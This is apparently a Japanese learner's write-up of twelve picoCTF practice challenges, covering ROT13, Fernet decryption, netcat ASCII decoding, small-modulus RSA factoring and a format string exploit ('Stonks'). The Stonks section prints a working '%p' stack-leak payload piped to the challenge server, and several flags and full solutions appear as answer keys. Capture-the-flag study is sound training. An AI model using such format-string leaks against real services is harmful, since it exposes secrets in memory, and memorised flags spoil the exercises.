picoCTF Practice Writeup 1

picoCTF Practice Writeup 1
picoGym Practice Challenges page=1 の12問を勉強した記録

１ページ目から難問があり 647 solves の Stonks (Format String Exploit) には苦戦した。

Obedient Cat

Category: General Skills
Description:
This file has a flag in plain sight (aka "in-the-clear"). Download flag.
Hints:

1. Any hints about entering a command into the Terminal (such as the next one), will start with a '$'... everything after the dollar sign will be typed (or copy and pasted) into your Terminal.
2. To get the file accessible in your shell, enter the following in the Terminal prompt: $ wget https://mercury.picoctf.net/static/fb851c1858cc762bd4eed569013d7f00/flag
3. $ man cat

Solution:

ダウンロードしたflagは拡張子が無いテキストファイル

Mod 26

Category: Cryptography
Description:
Cryptography can be easy, do you know what ROT13 is? cvpbPGS{arkg_gvzr_V'yy_gel_2_ebhaqf_bs_ebg13_GYpXOHqX}
Hints:

1. This can be solved online if you don't want to do it by hand!

Solution:

ROT13するだけ

Python Wrangling

Category: General Skills
Description:
Python scripts are invoked kind of like programs in the Terminal... Can you run this Python script using this password to get the flag?
Hints:

1. Get the Python script accessible in your shell by entering the following command in the Terminal prompt: $ wget https://mercury.picoctf.net/static/1b247b1631eb377d9392bfa4871b2eb1/ende.py
2. $ man python

ende.py

import sys
import base64
from cryptography.fernet import Fernet



usage_msg = "Usage: "+ sys.argv[0] +" (-e/-d) [file]"
help_msg = usage_msg + "\n" +\
        "Examples:\n" +\
        "  To decrypt a file named 'pole.txt', do: " +\
        "'$ python "+ sys.argv[0] +" -d pole.txt'\n"



if len(sys.argv) < 2 or len(sys.argv) > 4:
    print(usage_msg)
    sys.exit(1)



if sys.argv[1] == "-e":
    if len(sys.argv) < 4:
        sim_sala_bim = input("Please enter the password:")
    else:
        sim_sala_bim = sys.argv[3]

    ssb_b64 = base64.b64encode(sim_sala_bim.encode())
    c = Fernet(ssb_b64)

    with open(sys.argv[2], "rb") as f:
        data = f.read()
        data_c = c.encrypt(data)
        sys.stdout.write(data_c.decode())


elif sys.argv[1] == "-d":
    if len(sys.argv) < 4:
        sim_sala_bim = input("Please enter the password:")
    else:
        sim_sala_bim = sys.argv[3]

    ssb_b64 = base64.b64encode(sim_sala_bim.encode())
    c = Fernet(ssb_b64)

    with open(sys.argv[2], "r") as f:
        data = f.read()
        data_c = c.decrypt(data.encode())
        sys.stdout.buffer.write(data_c)


elif sys.argv[1] == "-h" or sys.argv[1] == "--help":
    print(help_msg)
    sys.exit(1)


else:
    print("Unrecognized first argument: "+ sys.argv[1])
    print("Please use '-e', '-d', or '-h'.")

pw.txt

dbd1bea4dbd1bea4dbd1bea4dbd1bea4

flag.txt.en

gAAAAABgUAIWuksW6PU7W1WFXiBWkF2S8VhtL_5335iazHhuBnWloiyt3ZAFwR2zyuG7iZLSVPaQIZLTxgo-WXIk6Cnk7-KZm1g1qo_v1zDMK5wDocmVFxL0o5ae6OrB9VKdh3HerIsy

Solution:
ende.pyに
usage_msg = "Usage: "+ sys.argv[0] +" (-e/-d) [file]"
とあり，エンコードもデコードもできそう。

>python ende.py
Usage: ende.py (-e/-d) [file]

>python ende.py -d flag.txt.en
Please enter the password:dbd1bea4dbd1bea4dbd1bea4dbd1bea4
picoCTF{4p0110_1n_7h3_h0us3_dbd1bea4}

Wave a flag

Category: General Skills
Description:
Can you invoke help flags for a tool or binary? This program has extraordinarily helpful information...
Hints:

1. This program will only work in the webshell or another Linux computer.
2. To get the file accessible in your shell, enter the following in the Terminal prompt: $ wget https://mercury.picoctf.net/static/a00f554b16385d9970dae424f66ee1ab/warm
3. Run this program by entering the following in the Terminal prompt: $ ./warm, but you'll first have to make it executable with $ chmod +x warm
4. -h and --help are the most common arguments to give to programs to get more information from them!
5. Not every program implements help features like -h and --help.

Solution:
ダウンロードしたwarmはELF
表層解析でフラグがとれる

information

Category: Forensics
Description:
Files can always be changed in a secret way. Can you find the flag? cat.jpg
Hints:

1. Look at the details of the file
2. Make sure to submit the flag as picoCTF{XXXXX}

Solution:

BASE64みたいな文字が

BASE64で正解

Nice netcat...

Category: General Skills
Description
There is a nice program that you can talk to by using this command in a shell: $ nc mercury.picoctf.net 22902, but it doesn't speak English...
Hints:

1. You can practice using netcat with this picoGym problem: what's a netcat?
2. You can practice reading and writing ASCII with this picoGym problem: Let's Warm Up

Solution:
nc で接続してみる

$ nc mercury.picoctf.net 22902
112
105
99
111
67
84
70
123
103
48
48
100
95
107
49
116
116
121
33
95
110
49
99
51
95
107
49
116
116
121
33
95
100
51
100
102
100
54
100
102
125
10

CyberChefにInputすると

CyberChefが自分で調理したがるので「おまかせボタン」を押す

Transformation

Category: Reverse Engineering
Description:
I wonder what this really is... enc ''.join([chr((ord(flag[i]) << 8) + ord(flag[i + 1])) for i in range(0, len(flag), 2)])
Hints:

1. You may find some decoders online

Solution:
picoCTF 2021 Transformation

Stonks

Category: Binary Exploitation
Description:
I decided to try something noone else has before. I made a bot to automatically trade stonks for me using AI and machine learning. I wouldn't believe you if you told me it's unsecure! vuln.c nc mercury.picoctf.net 16439
Hints:

1. Okay, maybe I'd believe you if you find my API key.

Solution:
writeupを見るとFormat String Bugがあると書いてある。

スタック見放題ってことかな？

$ nc mercury.picoctf.net 16439
Welcome back to the trading app!

What would you like to do?
1) Buy some stonks!
2) View my portfolio

1を入力

1
Using patented AI algorithms to buy stonks
Stonks chosen
What is your API token?

%pを入力

%p
Buying stonks with token:
0x9b6b410

さっきのところで %p.%p. を入力

%p.%p.
Buying stonks with token:
0x974b410.0x804b000.

%p.を50個送る

$ python3 -c 'print("1\n" + "%p." * 50)' | nc mercury.picoctf.net 16439
Welcome back to the trading app!

What would you like to do?
1) Buy some stonks!
2) View my portfolio
Using patented AI algorithms to buy stonks
Stonks chosen
What is your API token?
Buying stonks with token:
0x98f6410.0x804b000.0x80489c3.0xf7f9dd80.0xffffffff.0x1.0x98f4160.0xf7fab110.0xf7f9ddc7.(nil).0x98f5180.0x1.0x98f63f0.0x98f6410.0x6f636970.0x7b465443.0x306c5f49.0x345f7435.0x6d5f6c6c.0x306d5f79.0x5f79336e.0x62633763.0x65616336.0xffae007d.0xf7fd8af8.0xf7fab440.0xd7211f00.0x1.(nil).0xf7e3abe9.0xf7fac0c0.0xf7f9d5c0.0xf7f9d000.0xffae9b18.0xf7e2b58d.0xf7f9d5c0.0x8048eca.0xffae9b24.(nil).0xf7fbff09.0x804b000.0xf7f9d000.0xf7f9de20.0xffae9b58.0xf7fc5d50.0xf7f9e890.0xd7211f00.0xf7f9d000.0x804b000.0xffae9b58.

xxdで16進数を文字列に変換

$ python3 -c 'print("1\n" + "%p." * 50)' | nc mercury.picoctf.net 16439 | tr "." "\n" | xxd -r -p
7KH0ǖ057ocip{FTC0l_I4_t5m_ll0m_y_y3nbc7ceac6}@Je(��H4?      K hP(JeKht

スタックなのでlittle endianになっています。
CyberChefで変換

GET aHEAD

Category: Web Exploitation
Description
Find the flag being held on this server to get ahead of the competition http://mercury.picoctf.net:47967/
Hints

1. Maybe you have more than 2 choices
2. Check out tools like Burpsuite to modify your requests and look at the responses

Solution:

Mind your Ps and Qs

Category: Cryptography
Description:
In RSA, a small e value can be problematic, but what about N? Can you decrypt this? values
Hints:

1. Bits are expensive, I used only a little bit over 100 to save money

value

Decrypt my super sick RSA:
c: 240986837130071017759137533082982207147971245672412893755780400885108149004760496
n: 831416828080417866340504968188990032810316193533653516022175784399720141076262857
e: 65537

Solution:
パット見RSA256に見えるが

# 素因数分解できるか？
n = "831416828080417866340504968188990032810316193533653516022175784399720141076262857"
print(bin(int(n)))
print(len(bin(int(n)).replace("0b","")))

269

p = 1593021310640923782355996681284584012117
q = 521911930824021492581321351826927897005221

from Crypto.Util.number import *
import binascii
    
p = 1593021310640923782355996681284584012117
q = 521911930824021492581321351826927897005221
e = 65537
c = 240986837130071017759137533082982207147971245672412893755780400885108149004760496

d = inverse(e, (p-1)*(q-1))
n = p*q
plain = pow(c, d, n)
print(plain)
print(binascii.unhexlify(hex(plain)[2:]).decode('utf-8'))

RSA 512 までは家庭のパソコンでも素因素分解可能

Static ain't always noise

Category: General Skills
Description:
Can you look at the data in this binary: static? This BASH script might help!
Hints:
(None)

ltdis.sh

# !/bin/bash



echo "Attempting disassembly of $1 ..."


# This usage of "objdump" disassembles all (-D) of the first file given by 
# invoker, but only prints out the ".text" section (-j .text) (only section
# that matters in almost any compiled program...

objdump -Dj .text $1 > $1.ltdis.x86_64.txt


# Check that $1.ltdis.x86_64.txt is non-empty
# Continue if it is, otherwise print error and eject

if [ -s "$1.ltdis.x86_64.txt" ]
then
	echo "Disassembly successful! Available at: $1.ltdis.x86_64.txt"

	echo "Ripping strings from binary with file offsets..."
	strings -a -t x $1 > $1.ltdis.strings.txt
	echo "Any strings found in $1 have been written to $1.ltdis.strings.txt with file offset"



else
	echo "Disassembly failed!"
	echo "Usage: ltdis.sh <program-file>"
	echo "Bye!"
fi

Solution:
渡されたstaticというELFを表層解析したらフラグがある

Tab, Tab, Attack

Category: General Skills
Description:
Using tabcomplete in the Terminal will add years to your life, esp. when dealing with long rambling directory structures and filenames: Addadshashanammu.zip
Hints:

1. After unziping, this problem can be solved with 11 button-presses...(mostly Tab)...

Solution:
渡されたzipを解凍するとELFが出てくる表層解析するだけ